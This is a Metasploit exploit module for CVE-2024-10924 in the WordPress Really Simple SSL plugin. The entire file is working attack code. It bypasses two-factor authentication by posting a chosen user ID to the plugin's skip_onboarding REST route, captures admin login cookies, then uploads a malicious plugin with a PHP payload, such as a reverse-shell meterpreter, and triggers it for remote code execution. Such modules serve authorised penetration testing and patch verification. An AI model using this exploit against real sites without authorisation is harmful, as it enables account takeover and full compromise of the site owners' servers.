## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Payload::Php include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Really Simple SSL Plugin Authentication Bypass to RCE', 'Description' => %q{ This module exploits an authentication bypass vulnerability in the WordPress Really Simple SSL plugin (versions 9.0.0 to 9.1.1.1). The vulnerability allows bypassing two-factor authentication (2FA) and uploading a plugin to achieve remote code execution (RCE). Note: For the system to be vulnerable, 2FA must be enabled on the target site; otherwise, the exploit will not work. }, 'Author' => [ 'Valentin Lobstein', # Metasploit module 'István Márton' # Vulnerability discovery ], 'References' => [ ['CVE', '2024-10924'], ['URL', 'https://github.com/RandomRobbieBF/CVE-2024-10924'], ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass'] ], 'License' => MSF_LICENSE, 'Privileged' => false, 'Platform' => %w[unix linux win php], 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [ [ 'PHP In-Memory', { 'Platform' => 'php', 'Arch' => ARCH_PHP # tested with php/meterpreter/reverse_tcp } ], [ 'Unix In-Memory', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD # tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows In-Memory', { 'Platform' => 'win', 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2024-11-14', 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options( [ OptInt.new('USER_ID', [true, 'The user ID to target for 2FA bypass', 1]) ] ) end def check return CheckCode::Unknown('The WordPress site does not appear to be online.') unless wordpress_and_online? print_status("WordPress Version: #{wordpress_version}") if wordpress_version %w[really-simple-ssl really-simple-ssl-pro really-simple-ssl-pro-multisite].each do |slug| plugin_check = check_plugin_version_from_readme(slug, '9.1.2', '9.0.0') case plugin_check.code when 'appears' return CheckCode::Appears("Plugin #{slug} appears to be vulnerable.") when 'safe' return CheckCode::Safe("Plugin #{slug} is patched or not vulnerable.") end end CheckCode::Unknown('No vulnerable plugins were detected.') end def exploit admin_cookie = bypass_2fa fail_with(Failure::UnexpectedReply, 'Failed to retrieve admin cookie') unless admin_cookie print_status('2FA bypass successful. Uploading plugin...') upload_and_execute_payload(admin_cookie) rescue StandardError => e fail_with(Failure::Unknown, "An unexpected error occurred: #{e.message}") end def bypass_2fa user_id = datastore['USER_ID'] login_nonce = Rex::Text.rand_text_numeric(10) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'ctype' => 'application/json', 'data' => { 'user_id' => user_id, 'login_nonce' => login_nonce, 'redirect_to' => '/wp-admin/' }.to_json, 'vars_get' => { 'rest_route' => '/reallysimplessl/v1/two_fa/skip_onboarding' } }) fail_with(Failure::Unreachable, 'No response from the target') unless res case res.code when 404 fail_with(Failure::NotVulnerable, '2FA is not enabled or the plugin is misconfigured.') when 200 cookies = extract_cookies(res.get_cookies) fail_with(Failure::UnexpectedReply, 'Failed to retrieve admin cookies.') unless cookies return cookies else fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}.") end end def extract_cookies(cookie_header) match = cookie_header.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/) return match[1] if match nil end def upload_and_execute_payload(admin_cookie) plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}" payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the plugin') unless uploaded print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php") register_dir_for_cleanup("../#{plugin_name}") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }) end end